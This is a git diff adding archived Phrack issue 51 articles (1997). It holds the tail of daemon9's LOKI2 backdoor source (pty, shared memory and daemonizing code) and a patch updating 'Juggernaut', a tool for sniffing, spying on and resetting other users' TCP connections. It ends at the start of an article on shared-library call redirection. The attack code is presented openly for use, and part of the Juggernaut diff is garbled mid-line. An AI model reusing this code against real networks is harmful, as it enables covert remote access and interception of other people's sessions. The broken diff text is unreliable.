+  HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
+  HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
+  HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */
+
+  /* Round 4 */
+  II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
+  II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
+  II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
+  II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
+  II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
+  II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
+  II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
+  II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
+  II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
+  II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
+  II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
+  II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
+  II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
+  II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
+  II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
+  II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */
+
+  state[0] += a;
+  state[1] += b;
+  state[2] += c;
+  state[3] += d;
+
+  /* Zeroize sensitive information.
+
+
+Rivest                                                         [Page 14]
+
+RFC 1321              MD5 Message-Digest Algorithm            April 1992
+
+*/
+  MD5_memset ((POINTER)x, 0, sizeof (x));
+}
+
+/* Encodes input (UINT4) into output (unsigned char). Assumes len is
+  a multiple of 4.
+ */
+static void Encode (output, input, len)
+unsigned char *output;
+UINT4 *input;
+unsigned int len;
+{
+  unsigned int i, j;
+
+  for (i = 0, j = 0; j < len; i++, j += 4) {
+ output[j] = (unsigned char)(input[i] & 0xff);
+ output[j+1] = (unsigned char)((input[i] >> 8) & 0xff);
+ output[j+2] = (unsigned char)((input[i] >> 16) & 0xff);
+ output[j+3] = (unsigned char)((input[i] >> 24) & 0xff);
+  }
+}
+
+/* Decodes input (unsigned char) into output (UINT4). Assumes len is
+  a multiple of 4.
+ */
+static void Decode (output, input, len)
+UINT4 *output;
+unsigned char *input;
+unsigned int len;
+{
+  unsigned int i, j;
+
+  for (i = 0, j = 0; j < len; i++, j += 4)
+ output[i] = ((UINT4)input[j]) | (((UINT4)input[j+1]) << 8) |
+   (((UINT4)input[j+2]) << 16) | (((UINT4)input[j+3]) << 24);
+}
+
+/* Note: Replace "for loop" with standard memcpy if possible.
+ */
+
+static void MD5_memcpy (output, input, len)
+POINTER output;
+POINTER input;
+unsigned int len;
+{
+  unsigned int i;
+
+  for (i = 0; i < len; i++)
+
+
+/*
+Rivest                                                         [Page 15]
+
+RFC 1321              MD5 Message-Digest Algorithm            April 1992
+*/
+
+ output[i] = input[i];
+}
+
+/* Note: Replace "for loop" with standard memset if possible.
+ */
+static void MD5_memset (output, value, len)
+POINTER output;
+int value;
+unsigned int len;
+{
+  unsigned int i;
+
+  for (i = 0; i < len; i++)
+ ((char *)output)[i] = (char)value;
+}
+<--> md5/md5c.c
+<++> L2/pty.c
+/*
+ * LOKI
+ *
+ * [ pty.c ]
+ *
+ *  1996/7 Guild Corporation Worldwide      [daemon9]
+ *  All the PTY code ganked from Stevens.
+ */
+
+#ifdef  PTY
+#include "loki.h"
+
+extern int verbose;    
+
+/*
+ *  Open a pty and establish it as the session leader with a 
+ *  controlling terminal
+ */
+
+pid_t pty_fork(int *fdmp, char *slavename, struct termios *slave_termios, struct winsize *slave_winsize)
+{
+
+    int fdm, fds;          
+    pid_t pid;
+    char pts_name[20];
+
+    if ((fdm = ptym_open(pts_name)) < 0) 
+        err_exit(1, 0, verbose, "\nCannot open master pty\n");
+
+    if (slavename) strcpy(slavename, pts_name);
+
+    if ((pid = fork()) < 0) return (-1);
+
+    else if (!pid)
+    {
+        if (setsid() < 0) 
+            err_exit(1, 1, verbose, "\nCannot set session");
+
+        if ((fds = ptys_open(fdm, pts_name)) < 0)
+            err_exit(1, 0, verbose, "\nCannot open slave pty\n");
+        close(fdm);                  
+
+#if defined(TIOCSCTTY) && !defined(CIBAUD)
+        if (ioctl(fds, TIOCSCTTY,(char *)0) < 0)
+            err_exit(1, 1, verbose, "\nioctl");
+#endif
+                                        /* set termios/winsize */
+        if (slave_termios) if (tcsetattr(fds,TCSANOW, (struct termios *)slave_termios) < 0) err_exit(1, 1, verbose, "\nCannot set termio");
+	                                /* slave becomes stdin/stdout/stderr */
+        if (slave_winsize) if (ioctl(fds, TIOCSWINSZ, slave_winsize) < 0)
+            err_exit(1, 1, verbose, "\nioctl");
+        if (dup2(fds, STDIN_FILENO) != STDIN_FILENO)
+            err_exit(1, 0, verbose, "\ndup\n");
+        if (dup2(fds, STDOUT_FILENO) != STDIN_FILENO)
+            err_exit(1, 0, verbose, "\ndup\n");
+        if (dup2(fds, STDERR_FILENO) != STDIN_FILENO)
+            err_exit(1, 0, verbose, "\ndup\n");
+        if (fds > STDERR_FILENO) close(fds);
+
+        return (0);                     /* return child */ 
+    }
+
+    else
+    {
+        *fdmp = fdm;                    /* Return fd of master */
+        return (pid);                   /* parent returns PID of child */ 
+    }
+}
+
+
+/*
+ *  Determine which psuedo terminals are available and try to open one
+ */
+
+int ptym_open(char *pts_name)
+{
+
+    int fdm     = 0;                    /* List of ptys to run through */
+    char *p1    = "pqrstuvwxyzPQRST", *p2 = "0123456789abcdef";
+
+    strcpy(pts_name, "/dev/pty00");     /* pty device name template */
+
+    for (; *p1; p1++)
+    {
+        pts_name[8] = *p1;
+        for (; *p2; p2++)
+        {
+            pts_name[9] = *p2;
+            if ((fdm = open(pts_name, O_RDWR)) < 0)
+            {
+                                        /* device doesn't exist */
+	        if (errno == ENOENT) return (-1);
+                else continue;
+            }
+            pts_name[5] = 't';          /* pty -> tty */
+            return (fdm);               /* master file descriptor */
+        }	
+    }
+    return (-1);                        /* control falls here if no pty
+                                         * devices are available
+                                         */
+}
+
+
+/*
+ *  Open the slave device and set ownership and permissions
+ */
+
+int ptys_open(int fdm, char *pts_name)
+{
+
+    struct group *gp;
+    int gid = 0, fds = 0;
+
+    if ((gp = getgrnam("tty"))) gid = (gp -> gr_gid);
+    else gid = -1;                              /* Group tty is not in the group file */
+
+    chown(pts_name, getuid(), gid);             /* make it ours */
+                                                /* set permissions -rw--w---- */
+    chmod(pts_name, S_IRUSR | S_IWUSR | S_IWGRP);   
+
+    if ((fds = open(pts_name, O_RDWR)) < 0)
+    {
+        close(fdm);                            /* Cannot open fds */
+        return (-1);
+    }
+    return (fds);
+}
+
+#endif
+
+/* EOF */
+<--> pty.c
+<++> L2/shm.c
+/*
+ * LOKI2
+ *
+ * [ shm.c ]
+ *
+ *  1996/7 Guild Corporation Worldwide      [daemon9]
+ */
+
+
+#include "loki.h"
+#include "client_db.h"
+#include "shm.h"
+
+extern struct loki rdg;
+extern int verbose;
+extern int destroy_shm;
+struct client_list *client = 0;
+int semid;
+
+#ifdef STRONG_CRYPTO
+extern short ivec_salt;
+extern u_char user_key[BF_KEYSIZE];
+#endif
+
+/*
+ *  Prepare shared memory and semaphore
+ */
+
+void prep_shm()
+{
+
+    key_t shmkey    = SHM_KEY + getpid();  /* shared memory key ID */
+    key_t semkey    = SEM_KEY + getpid();  /* semaphore key ID     */
+    int shmid, len  = 0, i = 0;
+
+    len             = sizeof(struct client_list) * MAX_CLIENT;
+
+                                        /* Request a shared memory segment */
+    if ((shmid = shmget(shmkey, len, IPC_CREAT)) < 0)
+        err_exit(1, 1, verbose, "[fatal] shared mem segment request error");
+
+                                        /* Get SET_SIZE semaphore to perform 
+                                         * shared memory locking with
+                                         */
+    if ((semid = semget(semkey, SET_SIZE, (IPC_CREAT | SHM_PRM))) < 0)
+        err_exit(1, 1, verbose, "[fatal] semaphore allocation error ");
+
+                                        /* Attach pointer to the shared memory
+                                         * segment
+                                         */                       
+    client = (struct client_list *) shmat(shmid, NULL, (int)NULL);
+                                        /* clear the database */
+    for (; i < MAX_CLIENT; i++) bzero(&client[i], sizeof(client[i]));
+}
+
+
+/*
+ *  Locks the semaphore so the caller can access the shared memory segment.
+ *  This is an atomic operation.
+ */
+
+void locks()
+{
+
+    struct sembuf lock[2] = 
+    {
+        {0, 0, 0},
+        {0, 1, SEM_UNDO}
+    };
+
+    if (semop(semid, &lock[0], 2) < 0)
+        err_exit(1, 1, verbose, "[fatal] could not lock memory");
+}
+
+
+/*
+ *  Unlocks the semaphore so the caller can access the shared memory segment.
+ *  This is an atomic operation.
+ */
+
+void ulocks()
+{
+
+    struct sembuf ulock[1] = 
+    {
+        { 0, -1, (IPC_NOWAIT | SEM_UNDO) }
+    };
+
+    if (semop(semid, &ulock[0], 1) < 0)
+        err_exit(1, 1, verbose, "[fatal] could not unlock memory");
+}                      
+
+
+/*
+ *  Release the shared memory segment.
+ */
+
+void dump_shm()
+{
+
+    locks();
+    if ((shmdt((u_char *)client)) == -1)
+        err_exit(1, 1, verbose, "[fatal] shared mem segment detach error");
+
+    if (destroy_shm == OK)
+    {
+        if ((shmctl(semid, IPC_RMID, NULL)) == -1)
+            err_exit(1, 1, verbose, "[fatal] cannot destroy shmid");
+
+        if ((semctl(semid, IPC_RMID, (int)NULL, NULL)) == -1)
+            err_exit(1, 1, verbose, "[fatal] cannot destroy semaphore");
+    }
+    ulocks();
+}
+    
+/* EOF */
+<--> shm.c
+<++> L2/shm.h
+/*
+ * LOKI
+ *
+ * shm header file
+ *
+ *  1996/7 Guild Corporation Productions    [daemon9]
+ */
+ 
+
+#define SHM_KEY     242                 /* Shared memory key            */
+#define SEM_KEY     424                 /* Semaphore key                */
+#define SHM_PRM     S_IRUSR|S_IWUSR     /* Shared Memory Permissions    */
+#define SET_SIZE    1
+
+void prep_shm();                        /* prepare shared mem segment   */
+void locks();                           /* lock shared memory           */
+void ulocks();                          /* unlock shared memory         */
+void dump_shm();                        /* release shared memory        */
+<--> shm.h
+<++> L2/surplus.c
+/*
+ * LOKI2
+ *
+ * [ surplus.c ]
+ *
+ *  1996/7 Guild Corporation Worldwide      [daemon9]
+ */
+
+
+#include "loki.h"
+
+extern int verbose;    
+extern jmp_buf env;
+
+#define WORKING_ROOT "/tmp"             /* Sometimes we make mistakes.
+                                         * Sometimes we execute commands we
+                                         * didn't mean to.  `rm -rf` is much
+                                         * easier to palate from /tmp 
+                                         */
+/*
+ *  Domain names / dotted-decimals --> network byte order.
+ */
+
+u_long name_resolve(char *hostname)
+{
+
+    struct in_addr addr;
+    struct hostent *hostEnt;
+                                        /* name lookup failure */
+    if ((addr.s_addr = inet_addr(hostname)) == -1)
+    {   
+        if (!(hostEnt = gethostbyname(hostname)))
+            err_exit(1, 1, verbose, "\n[fatal] name lookup failed");
+        bcopy(hostEnt->h_addr, (char *)&addr.s_addr, hostEnt -> h_length);
+    }
+    return (addr.s_addr);
+}
+
+
+/*
+ *  Network byte order --> dotted-decimals.
+ */
+
+char *host_lookup(u_long in)
+{
+
+    char hostname[BUFSIZ] = {0};
+    struct in_addr addr;
+
+    addr.s_addr = in;
+    strcpy(hostname, inet_ntoa(addr));
+    return (strdup(hostname));
+}
+       
+#ifdef X86FAST_CHECK
+ 
+/*
+ *  Fast x86 based assembly implementation of the IP checksum routine.
+ */
+
+
+u_short i_check(u_short *buff, int len)
+{
+
+    u_long sum = 0;
+    if (len > 3)
+    {
+        __asm__("clc\n"
+        "1:\t"
+        "lodsl\n\t"
+        "adcl %%eax, %%ebx\n\t"
+        "loop 1b\n\t"
+        "adcl $0, %%ebx\n\t"
+        "movl %%ebx, %%eax\n\t"
+        "shrl $16, %%eax\n\t"
+        "addw %%ax, %%bx\n\t"
+        "adcw $0, %%bx"
+        : "=b" (sum) , "=S" (buff)
+        : "0" (sum), "c" (len >> 2) ,"1" (buff)
+        : "ax", "cx", "si", "bx");
+    }
+    if (len & 2)
+    {
+        __asm__("lodsw\n\t"
+        "addw %%ax, %%bx\n\t"
+        "adcw $0, %%bx"
+        : "=b" (sum) , "=S" (buff)
+        : "0" (sum), "c" (len >> 2) ,"1" (buff)
+        : "ax", "cx", "si", "bx");
+    }
+    if (len & 2)
+    {
+        __asm__("lodsw\n\t"
+        "addw %%ax, %%bx\n\t"
+        "adcw $0, %%bx"
+        : "=b" (sum), "=S" (buff)
+        : "0" (sum), "1" (buff)
+        : "bx", "ax", "si");
+    }
+    if (len & 1)
+    {
+        __asm__("lodsb\n\t"
+        "movb $0, %%ah\n\t"
+        "addw %%ax, %%bx\n\t"
+        "adcw $0, %%bx"
+        : "=b" (sum), "=S" (buff)
+        : "0" (sum), "1" (buff)
+        : "bx", "ax", "si");
+    }                                                                         
+    if (len & 1)
+    {
+        __asm__("lodsb\n\t"
+        "movb $0, %%ah\n\t"
+        "addw %%ax, %%bx\n\t"
+        "adcw $0, %%bx"
+        : "=b" (sum), "=S" (buff)
+        : "0" (sum), "1" (buff)
+        : "bx", "ax", "si");
+    }
+    sum  = ~sum;
+    return (sum & 0xffff);
+}
+
+#else                           
+
+/*
+ *  Standard IP Family checksum routine.
+ */
+
+u_short i_check(u_short *ptr, int nbytes)
+{
+
+    register long sum       = 0; 
+    u_short oddbyte         = 0;
+    register u_short answer = 0;
+
+    while (nbytes > 1)
+    {
+        sum += *ptr++;
+        nbytes -= 2;
+    }
+    if (nbytes == 1)
+    { 
+        oddbyte = 0;  
+        *((u_char *)&oddbyte) =* (u_char *)ptr; 
+        sum += oddbyte;
+    }
+    sum     = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
+    sum     += (sum >> 16);
+    answer  = ~sum;
+    return (answer);
+}
+
+#endif  /* X86FAST_CHECK */
+
+
+/*
+ *  Generic exit with error function.  If checkerrno is true, errno should
+ *  be looked at and we call perror, otherwise, just dump to stderr.
+ *  Additionally, we have the option of suppressing the error messages by
+ *  zeroing verbose.
+ */
+
+void err_exit(int exitstatus, int checkerrno, int verbalkint, char *errstr)
+{
+    if (verbalkint)
+    {
+        if (checkerrno) perror(errstr);
+        else fprintf(stderr, errstr);
+    }
+    clean_exit(exitstatus);
+}
+
+
+/*
+ *  SIGALRM signal handler.  We reset the alarm timer and default signal
+ *  signal handler, then restore our stack frame from the point that
+ *  setjmp() was called.
+ */
+
+void catch_timeout(int signo)
+{
+
+    alarm(0);                           /* reset alarm timer */
+
+                                        /* reset SIGALRM, our handler will
+                                         * be again set after we longjmp()
+                                         */   
+    if (signal(SIGALRM, catch_timeout) == SIG_ERR)
+        err_exit(1, 1, verbose, L_MSG_SIGALRM);
+                                        /* restore environment */
+    longjmp(env, 1);
+}
+
+       
+/*
+ *  Clean exit handler
+ */
+
+void clean_exit(int status)
+{
+
+    extern int tsock;
+    extern int ripsock;
+
+    close(ripsock);
+    close(tsock);
+    exit(status);
+}
+
+/*
+ *  Keep child proccesses from zombiing on us
+ */
+
+void reaper(int signo)
+{
+    int sys = 0;
+
+    wait(&sys);                     /* get child's exit status */
+
+                                    /* re-establish signal handler */
+    if (signal(SIGCHLD, reaper) == SIG_ERR)
+        err_exit(1, 1, verbose, L_MSG_SIGCHLD);
+}
+
+/*
+ *  Simple daemonizing procedure.
+ */
+
+void shadow()
+{
+    extern int errno;
+    int fd = 0;
+
+    close(STDIN_FILENO);            /* We no longer need STDIN */
+    if (!verbose)
+    {                               /* Get rid of these also */
+        close(STDOUT_FILENO);
+        close(STDERR_FILENO);
+    }
+                                    /* Ignore read/write signals from/to
+                                     * the controlling terminal.
+                                     */
+    signal(SIGTTOU, SIG_IGN);
+    signal(SIGTTIN, SIG_IGN);
+    signal(SIGTSTP, SIG_IGN);       /* Ignore suspend signal. */
+
+    switch (fork())
+    {
+        case 0:                     /* child continues */
+            break;                          
+
+        default:                    /* parent exits */
+            clean_exit(0);
+
+        case -1:                    /* fork error */
+            err_exit(1, 1, verbose, "[fatal] Cannot go daemon");
+    }
+                                    /* Create a new session and set this
+                                     * process to be the group leader.
+                                     */
+    if (setsid() == -1)
+        err_exit(1, 1, verbose, "[fatal] Cannot create session");
+                                    /* Detach from controlling terminal */
+    if ((fd = open("/dev/tty", O_RDWR)) >= 0)
+    {
+        if ((ioctl(fd, TIOCNOTTY, (char *)NULL)) == -1)
+                err_exit(1, 1, verbose, "[fatal] cannot detach from controlling terminal");
+        close(fd);
+    }
+    errno = 0;
+    chdir(WORKING_ROOT);            /* Working dir should be the root */
+    umask(0);                       /* File creation mask should be 0 */
+}
+
+#ifdef  DEBUG
+
+/* 
+ *  Bulk of this function taken from Stevens APUE...
+ *  got this from Mooks (LTC)
+ */
+
+void fd_status(int fd, int newline)
+{ 
+    int accmode = 0, val = 0;
+
+    val = fcntl(fd, F_GETFL, 0);
+
+#if !defined(pyr) && !defined(ibm032) && !defined(sony_news) && !defined(NeXT)
+    accmode = val & O_ACCMODE;
+#else                           /* pyramid */
+    accmode = val;              /* kludge */
+#endif                          /* pyramid */
+     if (accmode == O_RDONLY)       fprintf(stderr, " read only");
+     else if (accmode == O_WRONLY)  fprintf(stderr, " write only");
+     else if (accmode == O_RDWR)    fprintf(stderr, " read write");
+     if (val & O_APPEND)            fprintf(stderr, " append");
+     if (val & O_NONBLOCK)          fprintf(stderr, " nonblocking");
+     else                           fprintf(stderr, " blocking");
+#if defined(O_SYNC)
+     if (val & O_SYNC)              fprintf(stderr, " sync writes");
+#else
+#if defined(O_FSYNC)
+     if (val & O_FSYNC)             fprintf(stderr, " sync writes");
+#endif                          /* O_FSYNC */
+#endif                          /* O_SYNC */
+     if (newline)                   fprintf(stderr, "\r\n");
+}
+#endif  /* DEBUG */
+
+/* EOF */
+<--> surplus.c
+
+----[  EOF
+
diff --git a/phrack51/7.txt b/phrack51/7.txt
new file mode 100644
index 0000000..0d4ced0
--- /dev/null
+++ b/phrack51/7.txt
@@ -0,0 +1,351 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 07 of 17
+
+
+-------------------------[  Juggernaut 1.2 update
+
+
+--------[  route <route@infonexus.com>
+                                         
+
+
+	Well, Juggernaut went out, and the bug reports came in...  
+Juggernaut, the robust network tool for Linux, originally went out in Phrack 
+50.  This patchfile updates Juggernaut 1.0 (the version in P50-06) to version 
+1.2.  It offers the following:
+
+    - Nonfunctional things like nomenclature and cosmetics.
+    - The IFF_PROMISC flag is unset upon exit.  Previously the program would 
+      leave the network interface in promiscuous mode.
+    - We no longer are interested in HTTP connections (unless -DGREED is 
+      defined).
+    - Connection Spying now works properly.
+    - Connection RSTing and Automated connection RSTing now work better.
+
+
+		Please keep the bug reports coming in!
+
+    To extract this patchfile, use the included extraction utility to remove 
+the patchfile from the article.  Then simply copy it into the Juggernaut 
+directory and `patch <  juggernaut_1.0-1.2_patch`
+
+<++> juggernaut_1.0-1.2_patch
+
+--- NumberOneCrush/main.c	Thu May  8 15:37:02 1997
++++ NumberOneCrush/main.c	Fri Jun  6 01:33:42 1997
+@@ -1,7 +1,7 @@
+ /*
+  *
+  *			            Juggernaut
+- *				    Version b2
++ *				    Version 1.2
+  *
+  *                            1996/7 Guild productions
+  *			     daemon9[guild|phrack|r00t]
+@@ -42,7 +42,7 @@
+ #define DEVICE "eth0"
+ #define LOGFILE "./juggernaut.log.spy"
+ 
+-char version[]="1.0\0";
++char version[]="1.2";
+ int sigsentry=1;		    /* Signal sentry */
+ int ripsock=0;			    /* RIP socket */
+ int linksock=0;			    /* SOCK PACKET socket */
+@@ -96,8 +96,8 @@
+     char buf[MINIBUF]={0};
+     char token[2*MINIBUF]={0};
+     int c;
+-                                
+-    if(geteuid()||getuid()){	            /* r00t? */
++
++    if(geteuid()||getuid()){                /* r00t? */
+         fprintf(stderr,"UID or EUID of 0 needed...\n");
+         exit(0);
+         }
+@@ -279,7 +279,7 @@
+     	fgets(buf,sizeof(buf),stdin);
+     	if(buf[0]==0x0a||buf[0]=='q')return;
+     	if(!(int)(val=atoi(buf)))continue;
+-    	if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");	
++    	if(!(target=checkc(val)))fprintf(stderr,"Connection not in database.\n");
+     	else break;
+     }
+     fprintf(stderr,"\nDo you wish to log to a file as well? [y/N] >");
+@@ -324,7 +324,7 @@
+ 	fgets(buf,sizeof(buf),stdin);
+ 	if(buf[0]==0x0a||buf[0]=='q')return;
+    	if(!(int)(val=atoi(buf)))continue;
+-	if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");
++	if(!(target=checkc(val)))fprintf(stderr,"Connection not in database.\n");
+ 	else break;
+     }
+     signal(SIGINT,convulsion);
+@@ -440,7 +440,7 @@
+ 
+     fprintf(stderr,"Juggernaut %s route@infonexus.com [guild 1996/7]\n",version);
+ 
+-    fprintf(stderr,"\nJuggernaut compiled with the following options:\n");
++    fprintf(stderr,"\nBuilt on %s %s with the following options:\n",__DATE__,__TIME__);
+ #ifdef MULTI_P
+     fprintf(stderr," Multi-processing\n");
+ #endif
+@@ -501,7 +501,7 @@
+     	fgets(buf,sizeof(buf),stdin);
+     	if(buf[0]==0x0a||buf[0]=='q')return;
+     	if(!(int)(val=atoi(buf)))continue;
+-    	if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");	
++    	if(!(target=checkc(val)))fprintf(stderr,"Connection not in database.\n");
+     	else break;
+     }
+     if(ntohs(target->dport)!=23){
+@@ -547,7 +547,7 @@
+     	fgets(buf,sizeof(buf),stdin);
+     	if(buf[0]==0x0a||buf[0]=='q')return;
+         if(!(int)(val=atoi(buf)))continue;
+-        if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n");	
++        if(!(target=checkc(val)))fprintf(stderr,"Connection not in database.\n");
+     	else break;
+     }
+     if(ntohs(target->dport)!=23){
+--- NumberOneCrush/mem.c	Thu May  8 15:37:02 1997
++++ NumberOneCrush/mem.c	Fri Jun  6 01:33:09 1997
+@@ -1,7 +1,7 @@
+ /*
+  *
+  *                                  Juggernaut
+- *                                  Version b1
++ *                                  Version 1.2
+  *
+  *                            1996/7 Guild productions
+  *                           daemon9[guild|phrack|r00t]
+--- NumberOneCrush/menu.c	Thu May  8 15:37:02 1997
++++ NumberOneCrush/menu.c	Fri Jun  6 01:33:32 1997
+@@ -1,7 +1,7 @@
+ /*
+  *
+  *                                  Juggernaut
+- *                                  Version b2
++ *                                  Version 1.2
+  *
+  *                            1996/7 Guild productions
+  *                           daemon9[guild|phrack|r00t]
+--- NumberOneCrush/net.c	Thu May  8 15:37:02 1997
++++ NumberOneCrush/net.c	Fri Jun  6 01:32:56 1997
+@@ -1,7 +1,7 @@
+ /*
+  *
+  *                                  Juggernaut
+- *                                  Version b1
++ *                                  Version 1.2
+  *
+  *                            1996/7 Guild productions
+  *                           daemon9[guild|phrack|r00t]
+@@ -92,13 +92,14 @@
+  *  mode.
+  */
+ 
+-int tap(device)
++int tap(device,mode)
+ char *device;
++int mode;
+ {
+ 	
+     int fd;				
+     struct ifreq ifr;   /* Link-layer interface request structure */
+-                        /* Ethernet code for IP 0x800==ETH_P_IP */
++                        /* Ethernet code for IP 0x0800==ETH_P_IP */
+     if((fd=socket(AF_INET,SOCK_PACKET,htons(ETH_P_IP)))<0){	
+         if(verbosity)perror("(tap) SOCK_PACKET allocation problems [fatal]");
+         exit(1);					           
+@@ -109,16 +110,22 @@
+         close(fd);
+       	exit(1);
+     }
+-    ifr.ifr_flags|=IFF_PROMISC;	            /* Set promiscuous mode */
++    if(!mode)ifr.ifr_flags^=IFF_PROMISC;    /* Unset promiscuous mode */
++    else ifr.ifr_flags|=IFF_PROMISC;        /* Set promiscuous mode */
+     if((ioctl(fd,SIOCSIFFLAGS,&ifr))<0){    /* Set flags */
+-        if(verbosity)perror("(tap) Can't set promiscuous mode [fatal]");
++        if(verbosity)perror("(tap) Can't set/unset promiscuous mode [fatal]");
+         close(fd);
+ 	exit(1);
+     }
+-    return(fd);
++    if(!mode){
++        close(fd);
++        return(0);
++    }
++    else return(fd);
+ }
+ 
+ 
++
+ /*
+  *  Gimme a raw-IP socket.  Use of IP_HDRINCL is automatic with 2.0.x
+  *  kernels.  Not sure about 1.2.x
+@@ -197,7 +204,6 @@
+         case 22:
+         case 23:
+         case 25:
+-        case 80:
+         case 513:
+         case 6667:
+             if(((int)msg=addc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
+@@ -235,7 +241,6 @@
+         case 22:
+         case 23:
+         case 25:
+-        case 80:
+         case 513:
+         case 6667:
+             if(((int)msg=delc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg);
+@@ -261,7 +266,7 @@
+     void dumpp(char *,int,FILE *);
+ 
+     extern int sigsentry;
+-    int tlinksock=tap(DEVICE);	/* Spying tap.  XXX- Really dumb way to do this... */
++    int tlinksock=tap(DEVICE,1);    /* Spying tap.  XXX- Really dumb way to do this... */
+     time_t tp;
+ 
+     ALIGNNETPOINTERS();
+@@ -272,20 +277,14 @@
+         time(&tp);
+         fprintf(fp,": Log started:\t\t%s---------------------------------------------------------------------\n",ctime(&tp));
+     }
+-		    /* NO alaram timeout here.  SIGINT kills our spy session */
+-    while(sigsentry)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP)if(iphp->saddr==target->daddr&&tcphp->source==target->dport)dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epack.tcp),fp);
++		    /* NO alarm timeout here.  SIGINT kills our spy session */
++    while(sigsentry)if(recv(tlinksock,&epack,sizeof(epack),0))if(iphp->protocol==IPPROTO_TCP)if(iphp->saddr==target->daddr && iphp->daddr==target->saddr && tcphp->dest==target->sport)dumpp(epack.payload-2,htons(iphp->tot_len)-sizeof(epack.ip)-sizeof(epac
+
+
+
+
+
+
+
+
+k
++
++.tcp),fp);
+ 	
+     if(fp){
+         fprintf(fp,"\n---------------------------------------------------------------------\n: Juggernaut connection spy log trailer\n: %s [%d]\t-->\t %s [%d]\n",hostLookup(target->saddr),ntohs(target->sport),hostLookup(target->daddr),ntohs(target->dport
+
+
+
+
+
+
+
+
+)
+ 
+-
+-
+-
+-
+-
+-
+-
+-
+ );
+         time(&tp);
+         fprintf(fp,": Log ended:\t\t%s---------------------------------------------------------------------\n",ctime(&tp));
+@@ -347,8 +346,8 @@
+         unsigned short tlen;
+     }*ppheader;
+  		
+-    static int moot=0;
+-    int tlinksock=tap(DEVICE);
++    int moot=0;
++    int tlinksock=tap(DEVICE,1);
+ 
+     ALIGNNETPOINTERS();
+ 
+@@ -451,7 +450,7 @@
+     extern int ripsock;	
+     extern int acrstpid;
+     char *tempBuf=0;
+-    int tlinksock=tap(DEVICE);
++    int tlinksock=tap(DEVICE,1);
+ 
+     switch((acrstpid=fork())){ 	/* Drop a child to backround, return the 
+                                    parent to continue */
+@@ -570,7 +569,7 @@
+     extern int netreadtimeout;
+     static int len;
+     char *tempBuf;
+-    int tlinksock=tap(DEVICE);
++    int tlinksock=tap(DEVICE,1);
+ 
+     ALIGNNETPOINTERS();
+ 
+@@ -675,7 +674,7 @@
+     extern int netreadtimeout;
+     extern int sigsentry;
+     static int len;
+-    int tlinksock=tap(DEVICE);			
++    int tlinksock=tap(DEVICE,1);			
+     
+     ALIGNNETPOINTERS();
+ 
+@@ -799,7 +798,7 @@
+     int grabflag=0;                     /* Time to grab some packets */
+     unsigned long targetsourceip=0;
+     unsigned short targetsourceport=0;
+-    int tlinksock=tap(DEVICE);          
++    int tlinksock=tap(DEVICE,1);          
+ 
+     if(!(fp=fopen(SNIFLOG,"a+"))){      /* Log to file */
+         if(verbosity){
+--- NumberOneCrush/prometheus.c	Thu May  8 15:37:03 1997
++++ NumberOneCrush/prometheus.c	Fri Jun  6 01:33:17 1997
+@@ -1,7 +1,7 @@
+ /*
+  *
+  *                                  Juggernaut
+- *                                  Version b2
++ *                                  Version 1.2
+  *
+  *                            1996/7 Guild productions
+  *                           daemon9[guild|phrack|r00t]
+--- NumberOneCrush/surplus.c	Thu May  8 15:37:03 1997
++++ NumberOneCrush/surplus.c	Fri Jun  6 01:33:03 1997
+@@ -1,7 +1,7 @@
+ /*
+  *
+  *                                  Juggernaut
+- *                                  Version b2
++ *                                  Version 1.2
+  *
+  *                            1996/7 Guild productions
+  *                           daemon9[guild|phrack|r00t]
+@@ -29,6 +29,7 @@
+ #define HELPFILE    "./ClothLikeGauze/.help"
+ #define FBUFSIZE     80
+ #define MINIBUF      10
++#define DEVICE      "eth0"
+ 
+ extern int verbosity;    
+ 
+@@ -346,6 +347,7 @@
+ void cleanexit(){
+ 
+     void powerdown();
++    int tap(char *,int);
+ 
+     extern int ripsock;
+     extern int hpid;
+@@ -353,6 +355,7 @@
+ 
+     close(ripsock);
+     powerdown();
++    tap(DEVICE,0);                          /* Unset promisc mode on the interface */
+     if(kill(hpid,SIGUSR1))if(verbosity){    /* Send signal to the hunter */
+         perror("(cleanexit) Could not signal hunter");
+         fprintf(stderr,"[cr]");
+<-->
+
+
+
+----[  EOF
+
diff --git a/phrack51/8.txt b/phrack51/8.txt
new file mode 100644
index 0000000..3b5693b
--- /dev/null
+++ b/phrack51/8.txt
@@ -0,0 +1,211 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 08 of 17
+
+
+-------------------------[  Shared Library Redirection Techniques
+
+
+--------[  halflife <halflife@infonexus.com>
+
+
+This article discusses shared libraries - in particular, a method for doing 
+shared library based function call redirection for multiple purposes.  During 
+the process of writing some code, some bugs were discovered in a few shared 
+library implementations, these are discussed as well.
+
+First off, a short description of shared libraries is in order.  Shared 
